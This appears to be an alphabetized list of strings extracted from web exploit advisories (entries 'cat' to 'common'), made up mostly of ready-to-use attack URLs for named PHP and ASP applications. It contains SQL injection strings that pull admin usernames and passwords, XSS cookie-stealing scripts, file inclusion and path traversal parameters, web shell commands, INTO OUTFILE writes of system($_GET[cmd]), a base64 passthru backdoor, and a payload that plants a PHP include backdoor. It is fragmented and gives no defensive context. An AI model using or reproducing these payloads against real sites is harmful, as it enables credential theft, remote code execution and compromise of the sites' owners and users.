cat-sieges-31.html?tri=reference+and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%28SELECT%20distinct%20concat%280x7e,0x27,cast%28table_name%20as%20char%29,0x27,0x7e%29%20FROM%20information_schema.tables%20Where%20table_schema=0x7065656C5F7072656D69756D%20limit%203,1%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1
cat-sieges-[VICTIM].html?tri=reference+and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%28SELECT%20concat%280x7e,0x27,count%28table_name%29,0x27,0x7e%29%20FROM%20%60information_schema%60.tables%20WHERE%20table_schema=0x7065656C5F7072656D69756D%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1
cat-sieges-[VICTIM].html?tri=reference+and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1
cattadoc-2.21.tgz
cat_view
catviz.sourceforge.net
[CaupoShop]
cavt44703c30d3dbf.jpg%00
cazalet.org
cbadm
cbblog
cboard
c:boot.ini?showcode=1
[cb_path]
/?cc=62&PollID=1".$query, HttpRequest::METH_GET);
cca55760b985b02c1b9d7fac606shell.php
cccart
cc.cc.moose.cc
cce-interact
ccmail
/?ccm_order_by=numberOfResponses&ccm_order_dir=,(SELECT
CCMS_v3.1_by_Mikel_Dean.rar
cc                      #\n";
cc :)                #\n";
/?c='+cookie;
cc & Pal-Li0n.som           ]
cc_redirect.php?cc=Downloads&fn=%0A1
cc_redirect.php?cc=Downloads&fn=data:text
cc_redirect.php?cc=TestCounter&fn=%0AHeader:test
ccs
ccteam.ru
ccTiddly
CcTiddlyDeveloper
cctiddly-v176-multiple-remote-file.html
cd
cdaudio.ovh.org
cd-hotel
cdsagenda
cdscriptegrator
cdsware.cern.ch
CE_1.4.0.0-1.4.1.1.patch
CE_1.4.2.0.patch
CE_1.5.0.0-1.7.0.1.patch
celerbb.sourceforge.net
celeron.php?q=4sQL
celeron.php?q=-4+union+select+1,2,concat%28username,0x3e,pass%29+from+admin--
celeron.php?q=-4+union+select+1,2,concat(username,0x3e,pass)+from+admin--
cells
cel_pgsql.conf
censura.php?cmd=details&itemid=61 and substring(@@version,1,1)=4
censura.php?cmd=details&itemid=[bSQL]
censura.php?cmd=details&itemid=<script>alert(123)<
census.php?ref=<script>document.write("<img src='hacker.com
center>
center]
center><br>
center><br><br><font color=ff0000><h2>Get var (cmd) to execute comands. Enjoy it!<
centi
centipaid_class.php?absolute_path=[Evil_Script]
centre.class.php?path_om=[Shell]
centreon
centreon-enterprise-server-blind-sql-injection
centre.php?padmin=[LFI]%00
cerberus
cerberus-gui
cermi
certificate
cerulean
cetak.php?id=-9%20UNION%20SELECT%20null,null,null,password,null,user,null,null%20from%20user
cevhershare
cevhershare-admin.php?id=[SQL-Injection]
cfagcms
cfg
cf_image_host_v1.3.81
cfooter.php3 
cform
cform.class.php?system_path=[evil_scripts]
cform.datatype.php?system_path=[evil_scripts]
C_FormEvaluation.class.php?GLOBALS[fileroot]=[evil_scripts]
cFTP
cGhwIHBhc3N0aHJ1KCRfR0VUW2NtZF0pPz4nKTs=");
cgi
cgi-bin
cgi-mod
ch99.php
Ch99.php
challenge
change
change_action.php?format_menue=[[Sh3LL
change_action.php?format_menue=[[Sh3LLScript]]
changeclothes.php?message=<script>alert(document.cookie);<
change_config.php?group=1&flt_keel="><script>alert(123);<
change_config.php?group=1&site_name=hacked+by+cutehacker&slogan=hacked&meta_title=hacked&meta_description=hacked&meta_keywords=hacked&save=1&flt_keel=1&page_end_html=&timezone=">
change_config.php?group="><script>alert(123);<
change_config.php?salvesta=1&cff_save_error_log=0
change_config.php?salvesta=1&cff_save_error_log=1
changeEmail.inc.php?mysqlCall=[evil_script]
changeEmail.inc.php?mysqlCall=[file] 
changefrom.php?rid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7
changefrom.php?rid="><script>alert(1);<
<--  CHANGE HERE   -->
<-- CHANGE HERE -->
====>CHANGE HERE<======
changelog
CHANGELOG
changelog as "# Bugfix: Blind SQL injection"
changelogin.php?action=add"><br>
ChangeLog#v2235
Change_Log#Version_1.8.9>
changepass" method="post">
change_pass.php
Change_Pass.php method=post style="text-align: center">
changepassword
change_password"
changepassword.class.php?system_path=[evil_scripts]
changepassword.php
changepassword.php METHOD=POST>
change.php
change.php">                    
change.php) 
change.php HTTP
change.php" method="post" name="form1" id="form1" onSubmit="MM_validateForm('password','','R');return document.MM_returnValue">
changepw.cgi
changepwd.php
changePW.php">
changepw.php?path_faqe=[INDONESIANCODER]
changeset
change_submit.php?username=[user]&new_pass=[newpass]                                                #
change this to the same value as your
changeto.php?rid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7
changeto.php?rid="><script>alert(1);<
changeUserDetails.inc.php?mysqlCall=[evil_script]
changeUserDetails.inc.php?mysqlCall=[file] 
changeUserPass.php" method="post" name="changeUserPass">
 change X with number of post 
 change X with number of post    ########################################################################################
*&channel=3 
channel_detail.php?chid=-1+union+select+1,concat(0x3a,username,0x3a,pwd),3+from+signup-- 
channel_detail.php?chid=-1+union+select+1,concat(0x3a,username,0x3a,pwd),3+from+signup-- 	
channel_detail.php?chid=4 AND 1=1
channel_detail.php?chid=4 AND 1=2
channel_detail.php?chid=4 [Blind]
channel_detail.php?chid=-51+union+select+1,username,pwd,4,5,6,7,8,9,0,1,2,3,4,5,6+from+signup
channeledit.php?Codebase=[Shell]
channels.php
channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
channels.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27
chanpassamm.php?finame=1&password=testing&passver=testing *
chanpin_info.php?showlei=&Leiid=&n=1&id=-177+union+select+1,password,3,4,5,6,7,8+from+fk_admin
chaozz.deepunder.dk
" character sequences can be supplied by the user in an http variable that is used to reference a file on the webservers filesystem. As a result, the attacker can construct a path relative to the current working directory of the webserver using ".."'s and then the target filename
charray-cms
chart
chartdirector
chart.php?id=1' AND '1'='0
chart.php?id=1' AND '1'='1
charts.php?action=vote&rate=1&id=[SQL]
charts.php?lang=[LFI]
charts.php?language=[LFI]%00
chat
Chat
chat_admin
chat_admin%20limit%200,1
chat.asp
chat_asp%20limit%200,1
chatbox.php?showid=' union select 1,username,pwd,4,5,6,7,8 FROM ps_pfuser
chatconfig.php?currentlang=[LFI]
chat_dir
chat_download.php?fid=-99' UNION
chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);<
chat loads the Site chat page, which is stored as a template in the system. 
chat_log.php
chatness
chat_panel.php?talk=1&msg=%3C%3Fphp%0D%0A%24open_file+%3D+fopen%28%22..%2F..%2F..%2Fevilfile.php%22%2C+%22w%22%29%3B%0D%0Afputs%28%24open_file%2C%22%3C%3Fphp+include%28%5C%24_GET%5B%27evil_include%27%5D%29%3B+%3F%3E%22%29%3B%0D%0Afclose%28%24open_file%29%3B%0D%0Achmod%28%22..%2F..%2F..%2Fevilfile.php%22%2C0777%29%3B%0D%0A%3F%3E
chat_panel.php?talk=1&msg=[evilcode]
[chat_path]
chat.php
chat.php?DOCUMENT_ROOT=
chat.php?Username='UNION%20SELECT%200,0,0,0,'<?system($_GET[cmd]);?>',0,0,0%20INTO%20OUTFILE%20'..
chatrooms
chatrooms.php?action=phpinfo
chaussette
chcounter
chCounter3
"> chCounter 3.1.1 (13|07|2005)©2005 www.Christoph Bachner.net<
chcounter.org
cheats
checkavail.php?ln=en&id=-1+union+select+concat_ws(0x3a,UserName,UserPassword)+from+users--
checker.php
 check here ^_^
".$check[$i]."?cmd=ls%20-la";die;
".$check[$i]."?cmd=ls%20-la\r\nalso, you should have a backdoor called suntzu.php in the same folder\r\n";
".$check[$i]."?cmd=ls%20-la\r\nalso, you should have a backdoor called suntzu.php in the same folder\r\n";die;
checknew 10\n";
checkout
CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=RFI
checkout_payment.php?payment_error=cc&error=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C
checkout.php?abs_path=[shell]"
checkPasswd.inc.php?mysqlCall=[evil_script]
checkPasswd.inc.php?mysqlCall=[file] 
check.php
check.php" method="post">
check_requirements.php
 check the mysql version. if 4 returns error, try 5.
checkup
checkup.sourceforge.net
checkusername.php";
checkuser.php
check_user.php',[ user_name => $param ]);
cheesyblog
cherche.php?limite=-1%20union%20select%200,pseudo,0,mdp,0,0%20from%20webring
chg.php?host=|id>
chgpwd.php?USERNAME=[username]&PASSWORD='%20OR%20''='
chicomas
/?chid=4
chillycms
chillyCMS
chillycms.bplaced.net
chimera
   [China Script]                                                             
chinese.php<br>");}
chinese.php?suntzu=netstat%20-ano
ch_info.php?newpass=password&confirm=password
chipmunkcms
chk,9056372cb7b40c9809ba7070ffde09f3
chk,a39037e15bb5cd125f3cfd9dccaec6f5
chk,cb182dd5ecd024f36f7a8fa98dd8935e
choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin--
choosecard.php?catid=-1+uniOn+select+concat%28username,0x3a,password%29,555555555555,6666666666666666666+from+admin--
choosecard.php?catid=-1+uniOn+select+version%28%29,555555555555,6666666666666666666+from+admin--
chooseresource.htm
choose_sell_format.php
Choose~this~name~yourself,508+and+1=0--+ 
Choose~this~name~yourself,508+and+1=1--+ 
chosen_authors_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
chosen_blogs_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
chosen_comments_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
chrisnolan.org
christoph-bachner.net
/?chronopay_callback=true
churchinfo
churchinfo-1.2.12
chxsecurity.org
ciamos
Ciamos
ciamosinstalation
ciamosmodules
ciao
ciaranmak
ciberia
&cid=1
&cid=&type=file&folder=&lang=en&delfile=q.php&single=false
&cid=&type=file&single=false&folder=&lang=en
*&cid=&w=&d=9&m=1&y=2008&selection=1
cijfer.php?cij=".$string);
cikkform.php?cid=1
cimages.php?name=..
cimetiere.class.php?path_om=[Shell]
cimy-counter
cimy_counter.php
cindefn.php?INDEX=3%3C
circolari
cir_save.php?CLASSPATH=[AvriLhea]                                                                
cisco
citrusdb
cityadmin
city_reviewer
cityview.php?cityid=-5+UNION+ALL+SELECT+1,2,3,concat(user(),0x3a,version()),5--
citywriter
civicrm
civicrm-latest
civicrm.org
cjaycontent
 cjjjauie95inbmo5fim8m93vo1\r\n";
ckeditor
ckeditor)
CKEditor
CKEditor%204.0.1
ck-processkarma.php?path=1&action=1&id=1%20and%201=2%20--%20
">CKSource<
clanek.php?id=1'
clanek.php?id=[SQL Injection]
clanlite
clanlite_path
ClanPortal
clansphere
clansphere_2011.3
clanspherepath
clansuite
Clansuite
[ClanSysPath]
clantiger
claroline
claro_main.conf.php
clas
class
Class
class_ads
class.cs_phpmailer.php?classes_dir=[evil_scripts]
class.definition.php?GLOBALS[where_lms]=[cmd_url]
classes
Classes
" class="form-horizontal" id="mail-settings-form" original-class="form-horizontal">
class.forumposts.php?bbPath[path]=..
class.forumposts.php?cmd=ls%20-la&bbPath[path]=..
class.forumposts.php?cmd=ls%20-la&bbPath[path]=[how far from runcms root?]..
class.holidaycalc.inc.php?GLOBALS[phpgw_info][user][preferences][common][country]=..
class.html.mime.mail.php 
classi
classic
Classic.view
classifide_ad.php?item_id=-1
classifide_ad.php?item_id=-2872+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58--
classified
classified-ads
classified-ads-software.php
classified-listing.php?catId=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--
classified.php?catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7--
classified.php?catid=2&subcatid=5&adid=832 order by 66
classified.php?catid=2&subcatid=5&adid=832 order by 67
classified.php?catid=2&subcatid=5&adid=832 order by 911
classified.php?catid=2&subcatid=5&adid=832 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,username,password,53,54,55,56,57,58,59,60,61,62,63,64,65,66 from mysql.user
classified.php?catid=2&subcatid=5&adid=832 union select sum(somecolumn) from users--
classified.php?catid=x&subcatid=x&adid=x SQL INJECTION
classifieds
classifieds1
classifieds2
classifiedsblaster
classifiedsblaster.php
classified-script.html
classifiedshosting.php
Classifieds_Merchandise
Classifieds_MSAccess.mdb
Classifieds_Personal
classifieds.php
classifieds.php?cat=144+union+select+username,password,3,4+from+users
classifieds.php?cat=[N.A.S.T ]
classifieds.php?productid=1 << and 1=0
Classifieds_Realestate
".$classifiedsserver;
classifieds-software
classipress
classlux.php?Class=Luxury&Subclass=
classlux.php?Class=Luxury&Subclass=<font color=red size=15>CoBRa_21<
class_mail.inc.php?path_to_folder=[shell]
classmate
classmate_script.php
class.module
class_mysql.php
class.mysql.php?path_to_bt_dir=)<br>"
.class.php%27%20--%202%20
class.phpcaptcha.php?this=id>
class.php?Class=Rental&Subclass=
class.php?Class=Rental&Subclass=<font color=red size=15>CoBRa_21<
class.php?Class=Sales&Subclass=
class.php?Class=Sales&Subclass=<font color=red size=15>CoBRa_21<
class.phpmailer.php?lang_path=[EV!L]
class.phpmailer.php?lang_path=[inj3ct0r RFI]
class.phpmailer.php?lang_type=[inj3ct0r RFI]
class.phpmailer.php?sendmail=id
class.Smarty.php?cfg[sys][base_path]=[evilcode] 
class.template.php?panelPHPFile=[EV!L]
class_template.php?quezza_root_path=
class.thcsm_user.php?is_path=[evilc0de]
class.Tree.php?GLOBALS[thCMS_root]=[evilc0de]
class.uebimiau_mail.php
class.uebimiau.php
classweb
clausvb.de
cldb.mdb
clean_cms
clear
clearBudget.0.9.8
clearqueue.php" method="POST">
[clevercopy_path]
cl_files
cli_bounce.php
click_ads.php
ClickAndEmailDemo
clickbank
clickbank_directory.html
Clickheat
Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
click.php?bid=-1 UNION SELECT pass FROM bcoos_users LIMIT 1
click.php?hostid=2&targetid=56%20and%20substring%28@@version,1,1%29=4 <= False so the page isn't redirected
click.php?hostid=2&targetid=56%20and%20substring%28@@version,1,1%29=5 <= True so the page is redirected
click.php?hostid=[nr1]&targetid=[nr2] and 1=1 <= True so the page is redirected
click.php?hostid=[nr1]&targetid=[nr2] and 1=2 <= False so the page isn't redirected
click.php?hostid=[nr1]&targetid=[nr2] and substring(@@version,1,1)=4 <= False so the page isn't redirected
click.php?hostid=[nr1]&targetid=[nr2] and substring(@@version,1,1)=5 <= True so the page is redirected
click.php?id=1
click.php?id=2
click.php?id=8
click.php?itemid=[Valid ID]+[Blind SQL Injection]
click.php?_SERVER[DOCUMENT_ROOT]=
client
clientarea.php?action=red&templatefile=..
clientarea.php?action=[wrong_value]&templatefile=[LFD]%00
ClientData
clientdir
client.php?c[components]=[-Sh3ll-]
client.php?dir=[Evil_Script]
clients
clientscript
clients-oriented-ftp
clients.php?mode=search&sid=<sidvalue>&contact_search=<script>alert('c')<
clientupdreg.asp?Client_ID=1%20having%201=1
clip
clipak
clipbucket
ClipBucket%20v2
clipshare
cliserv
/?CLm[CALENDAR_NAME]=1333333337
clnt
clockstone
clockstone-ultimate-wordpress-theme
cloner.cron.php?config=..
cloneTab.php" method="post">
cloneTab.php?success=1&msg[]=<script>alert(123);<
cloneZenphoto
close.php?id=..
closeup.php?image=%22%3E%3Cscript%3Ealert(document.cookie)%3C
close-x.png"
cloudscan.me
clscript-classified-script
cls_fast_template.php?fname=attacker's site
club_extensions
club-nuke path
clubpage.php?id=30 and 1=1 [and 1=2]
cluster-E.php?ModPath=..
cluster-paradise
cm_4p
      cmd 
 cmd 
/?&cmd=
/?&cmd= 
[CMD] 
CMD_ACCOUNT_ADMIN" method="post">
cmd?cmd=$cmd HTTP
cmd.co?
CMD_DB?action=create&domain=domain_name&name=b0f
&cmd=dir
cmd.do?
CMD_EMAIL_POP?action=modify&domain=domain_name&user
CMD_EMAIL_POP" method="post">
cmd.gif
cmd.gif?
cmd.gif? 
cmd.gif???                            [[
cmd.gif cmd
cmd.gif?&cmd=id
cmd.gif?&cmd=id 
cmd.gif?&cmd=id;uname%20-a;uptime 
cmd.gif?&cmd=ls
cmd.gif?cmd=ls
cmd.gif?&cmd=uname -a
cmd.gif \r\n";
cmd?&=id
cmd.kid?
&cmd=ls
&cmd=ls%20-la
 || $cmdo!~
cmd.php
cmd.php?
cmd.php'
cmd.php?1
cmd.php and the command will be
cmd.php?cmd=..
cmd.php?cmd=cat%20
cmd.php?cmd=[command linux]
cmd.php?cmd=id;ls
cmd.php?cmd=[your command]  
cmd.php?exec=uname
cmdphp.mp3%00
CMD_REDIRECT?domain=domain_name&action=add
 cmd\r\n\r\n";
cmdshell.php
CMD_SUBDOMAIN" method="post">
&cmd=uname%20-a
/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar
/?cmd=urunler&cat_id=30+union+select+0+from+eng
/?cmd=urunler&cat_id=30+union+select+0+from+tr
 || !$cmdv)
 || !$cmdv) { usage(); }
 || !$cmdv){usage()}
cmme.oesterholt.net
cms
[cms]
cms 
cms)');
cms0
cms01
cmsadmins
cms_authuser
cms-balitbang-admin_gambar-v3-3-file-upload-vulnerabilities
cms-balitbang-v-33-arbitary-file-upload.html
[cms-bandits]
cms-bandits
cms-bg.org
cms.clicknet.dk
cmscore.php
cms-cvi
cms-db.de
cms_demo
cmsdemo.enterbt.hu
cmsdemo.enterbt.hu ]
cms_detect.php?include=..
CMS engine you can install on your own website.
cmsfaethon
cmsfaethon-2.0.4-ultimate
cmsfaethon.org
[cms_faethon_path]
cmsfs114b.tgz (tested package)
cms.fuzzylime.co.uk
cms.fuzzylime.co.uk |
cms.genium.ch )
cms.html
cmsignition.htm
cmsimple
cmslite 10\n";
[cmslite_path]
cmslogik
cms-lokomedia-15-arbitary-file-upload.html
cmsmadesimple
CMS_Made_Simple
cmsmasters.net
cms.maury91.org
cmsmelborp
cms milw0rm\r\n";
cmsmini
[cmsmini_path]
cmsms
cms]\n");
cms.netrix.hu
cms-news-und-infos
cms.odlican.net
cms-pack
cmspages.php?id=-43+union+select 1,2,group_concat(FName,0x3a,password),4+from+admin--
cmspages.php?id=[SQL]
cmspath
[cms_path]
[cmspath]
[CMS path]
cms_path admin_hash\n";
cms_path admin_username\n";
cms_path cmd path_of_site\n";
cms_path file_disc file\n";
cms_path file_disc\n";
cms_path lfi_path\n\n";
cms_path local_file_to_upload \n\n";
cms_path\n\n";
cms_path string_to_inject\n\n";
cmsphp
cms.php
cms.php    +
cms.php ]
cms.php?categoryid=10
cms.php?categoryid=[SQLi]
cms.php?id=5+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))--+      
cmspro
cms-pro-lightweight-content-management-system
cmsqlite
cmsqlite.127.0.0.1:8080
cmsr
cms\r\n";
cms_school
cms shell.php\n";
cms.sisplet.org
cms StAkeR obscure
cms StAkeR obscure\n\n";
cms_view.php?lang=1&id=50'
cms_view.php?lang=1&web_id=1021'
cms_view.php?lang=1&web_id=1021 and ascii(substring((SELECT concat(user_name,0x3a,user_password,0x3a,email,0x0a) FROM usertable limit 0,1),1,1))>80
cms_view.php?lang=1&web_id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(email,0x3a,user_password,0x0a),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90 from usertable--
cms.webspell.org
cms_write.php
cmuuugy61u0m
cn
cnbrkbolat
cn_config.php 
".$cnserver;
cn_users.php",
coast-0.95.tgz?modtime=1222363198&big_mirror=0
coastal
CoBRa_21
cockor.free.fr
/?cod=1  <- SQL
cod2demo.ultrastats.org
cod3rz.helloweb.eu
cod3rz.helloweb.eu<
cod3rz.helloweb.eu                                                                                         #
cod3rz.helloweb.eu                                             #
cod3rz.helloweb.eu                        \n";
code
_code_
_code_(.*)
[code] 
code]
[CODE]? 
codebreak.php" method="post">
codebrowserpntm.php?downloadfolder=pnTresMailer&filetodownload=..
codecanyon.net
codeclassic.org
coded.altervista.org
[codeDB_path]
codefiles
codefuture.co.uk
code.joomla.org
code.js><
code.js">test<
code.launchpad.net
codelib
code.php 
code.php?file=..
code.php?id=-85+union+select+85,85,concat_ws(char(58),user(),version(),database())+from+answers--
code.php?load=banner&id=1 and ascii(substring((SELECT concat(username,char(62),password) from admin limit 0,1),1,1))>95
code.php?load=banner&id=1 and substring(@@version,1,1)=4 <-- TRUE!  (MySQL version 4)
code.php?load=banner&id=1 and substring(@@version,1,1)=5 <-- BLANK
code.php?load=banner&id=-1 UNunionION select 1,2,3,'<? include($Q);?>',5,6,7,8,9 into outfile '
~codereview
coderx.org
codes
codesearch
codes-english.php?show=%3C
codethat
Codev
codex.wordpress.org
code.zikula.org
codice
codigolivre.org.br
coding
CoffieNet
coins_list.php?member_id=[SQL] 
coldzero.shell
coldzero.shell?cmd
collabtive
Collabtive 
collabtive-10-sqli.html
collabtive.o-dyn.de
collapsing-archives
collection.class.php?GLOBALS[application][app_root]=[SHELL]
collections.php
collections.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
collectivite.class.php?path_om=[Shell]
collectivite.class.php?path_om[Shell]
collector.php?kuka=\"%2Bdocument.cookie;<%2Fscript>";
collect.php?neturl=..
col_man
color]
color] 
colorchooser.php?path_faqe=[INDONESIANCODER]
color.inc.php
colorpicker
colorpicker.inc&field=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C
colorpicker.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
colors.php?color=<
colors.php?gfplugins=[Shell]
colorwheel.php?path_faqe=[INDONESIANCODER]
column_banner.php?language=[EV!L]
column.inc.php?lang_path=[cmd_url]
 columns vary..
com
com_aardvertiser%20V2.1.1%20Free
com_aclassf
com_admin-copy_module
com_agora
com_ajaxchat
com_alphauserpoints
com_artforms
com_bayesiannaivefilter
com_biblioteca
com_booklibrary
com_cartikads
com_cgtestimonial
com_clan
com_clickheat
com_competitions
com_dadamail
com_dbquery
com_del.php?class_path=[EV!L]
comentarii.php?idp=[SQL] 
comentar.php?id=-0' union all select 1,2,3,group_concat(concat(email,0x3c3d3e,usuario,0x3c3d3e,senha,0x3c3d3e,admin,0x3c3d3e,banido)),5 from usuarios--+
com_estateagent
cometchat
cometchat-critical-security-update
com_expose
com_extcalendar
com_ezine
com_feederator
com_flyspray
com_forum
ComGetLogFile.php3?fn=..
ComGetLogFile.php3?fn=Eye2005_02.log
com_googlebase
com_groupjive
com_hbssearch
comic
comic_paht
com_intuit
com_ionfiles
com_jcalpro
com_jcs
com_jemessenger
com_jesectionfinder
com_jooget
com_joom12pic
com_joomgalaxy
com_joomlaflashfun
com_joomla-visites
com_jp_jobs
com_juser
com_jwmmxtd
comkunena2.png
com_loudmounth
&com=ls
comm
com_magazine_3_0_1
com_mailto
com_mamboleto
command
commander
command.php?
CommandProcessor.php?GLOBALS[g_campsiteDir]=[SHELL]
command_test.php?cmd_str=ifconfig;";
commedia
com_mediaslide
Commence
comment
Comment
comment_accepter.php?id=[id_comment]
comment.add.php
commentaires.php?id=[SQL]
comment_form
commentform.php?tpl_base_dir=[evil script]
comment_form.php?_zp_themeroot="><script>alert(123);<
commentics
comment.php?action=create&area=1" method="post" name="main" >
comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members
comment.php?blog=..
comment.php?dlid=&#039;
comment.php?dlid=33&ENGINEsessID=2fcff934ccb74a561cd4c5df3dacd345
comment.php?file=..
comment.php?gb_id=1<script>alert(document.cookie);<
comment.php?id=-1' UNION ALL SELECT
comment.php?ID=-67+union+select+concat(user(),char(32),database(),char(32),@@version_compile_os)
comment.php?ID=EV!L EXPLO!T
comment.php?ID=[SQL]
comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)<
comment.php?mode=display&sid=filemgmt-XXX&title=[SQL
comment.php?op=CatID%3D0&CatName=1<ScRiPt%20%0d%0a>alert(213771818860)%3B<
comment.php?op=CatID%3D0&CatName=indoushka@hotmail.com-00213771818860&CaricatierID=1
comment.php?op=del&id=3&aantal=4
comment.php?rid=1 and 1=1-- 
comment.php?rid=1 and 1=2-- 
comment.php?rid=1 and substring(@@version,1,1)=4 
comment.php?rid=1" -p rid -a ".
comment.php?serendipity[type]=trackbacks&serendipity[entry_id]=0%20and%200%20union%20select%201,2,3,4,username,password,7,8,9,0,1,2,3%20from%20serendipity_authors%20where%20authorid=1%20
comment.php?type=filemgmt&cid=filemgmt-1'70
comment.php?what=news&id=<news id>
comment_pics.php?imgId=id
comment-rating
comment-rating-options.php
comment_refuser.php?id=[id_comment]
comments
commentsaction.php">
comments-display-tpl.php?config[comments_form_tpl]=[evilcode]
comments-display-tpl.php?language_file=[evilcode]
comments.inc.php?rel=[cmd_url]
comments_items.php
_comments_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
comments.php
comments.php">
comments.php?AMG_serverpath=[evil_script]
comments.php?delete=2
comments.php?eid=-1+UNION+SELECT+concat_ws(0x3a,username,password),2+FROM+phsblog_users
comments.php?entry=-122222 union select 0,concat(0x223E,version(),0x3A,user())--
comments.php?id=1%20and%20substring(@@version,1,1)=4
comments.php?id=1%20and%20substring(@@version,1,1)=5
comments.php?id=1 and 1>3
comments.php?id=1 and 2>1
comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,26,27+from+boka_members%23
comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,password,4,5,6,...,37,38+from+boka_members%23
comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,38,39+from+boka_members%23
comments.php?id=-1'union%20select%201,2,nick,4,5,password,7%20from%20shnews3_users%20where%20id=1
comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0x71)--
comments.php?id=-1 UNION SELECT 1,2,unhex(hex(database())),4,5,6,7--
comments.php?id=-1 UNION SELECT 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM mysql.user LIMIT 0,1
comments.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1
comments.php?id=news_id
comments.php?id=[SQL]
comments.php?id='[SQLI]
comments.php?id=-SQL Inj.-
comments.php?id=[SQL Query]
comments.php?id='+UNION+SELECT+666,null,concat('username:',username,',password:',password),1,null,1+FROM+members+ORDER+BY+id+DESC+LIMIT+1
comments.php?image_id=1 and ascii(substring((SELECT concat(login,0x3a,pass) from yap_user limit 0,1),1,1))>97
comments.php?image_id=1 and ascii(substring((SELECT concat(login,0x3a,pass) from yap_user limit 0,1),2,1))>100
comments.php?ItemID=-1+union+select+concat(AdminID,char(58),AdminPass,char(58),AdminName,char(58),AdminEmail)+from+dd_admin
comments.php?ItemID=-1+union+select+concat(username,char(58),password,char(58),email)+from+dd_users+where+UserID=[UserID]
comments.php?keyword=%22%3E%3Cscript%3Ealert('Hi+Master');%3C
comments.php?keyword=&author=&cat=0&since=1&sort_by=date&sort_order=descending&items_number=[SQL] 
comments.php?keyword=&author=&cat=0&since=1&sort_by=[SQL]
comments.php?keyword=&author=&cat=0&since=[SQL]
comments.php?keyword=charif38@hotmail.fr&author=sweet&cat=1[SQLi]&since=1&sort_by=date&sort_order=DESC&items_number=5
comments.php?language=..
comments.php?language=[Local File]%00
comments.php?message=<script>alert(document.cookie);<
comments.php" method="post">
comments.php?nid=
comments.php?nid=10
comments.php?nid=9
comments.php?nid=%BF%27%22%28
comments.php?nid=<script>var+pf_687474703a2f2f6c6f63616c686f73742f74756775782f636f6d6d656e74732e706870_6e6964=new+Boolean();<
comments.php?op=del&cid=
comments.php?op=edit&cid=
comments.php?submit=JIKO&entry=[EV!L]
comments.php?template=[LFI]
comments.php?templates_dir=[LFI]
comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors
comments.php?thold =0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users
commit
com_mojo
common
common2.asp?id=1
CommonAjax.php?module=Email&file=bar
common.class.php?mosConfig_absolute_path=
common.inc.php
common.inc.php?allclass[0]=[base64_encode(eval php code)]
